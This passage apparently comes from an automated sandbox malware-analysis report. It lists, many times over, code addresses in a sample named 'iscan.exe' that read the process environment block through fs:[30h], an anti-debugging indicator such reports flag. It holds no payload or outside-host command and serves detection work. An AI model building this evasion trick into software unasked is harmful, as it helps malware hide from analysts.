          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
